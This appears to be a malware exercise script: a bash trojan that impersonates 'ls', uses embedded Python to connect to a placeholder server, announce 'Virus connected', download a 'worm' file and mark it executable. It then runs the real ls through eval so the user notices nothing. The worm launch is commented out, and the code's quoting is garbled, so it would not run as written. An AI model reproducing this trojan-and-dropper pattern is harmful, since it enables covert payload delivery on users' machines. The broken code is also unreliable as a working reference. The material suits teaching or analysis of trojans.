#!/usr/bin/bash

# get worm from server
python3 - <<END
import socket
import time
from os import popen

HOST = "server_host"
PORT = "server_port"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))

while True:
    outdata = "\"Virus connected"\"
    s.send(outdata.encode())
    indata = s.recv(1024)
    break

f = open("\"worm"\", "\"w\"")
f.write(indata.decode())
f.close()
END

chmod +x worm
# ./worm

# call the original ls
cmd="\"/usr/bin/ls"\"
for arg in "\"\$\@"\" 
do
    cmd="\"\$cmd \$arg"\"
done
eval \$cmd
# rm -f worm
exit 0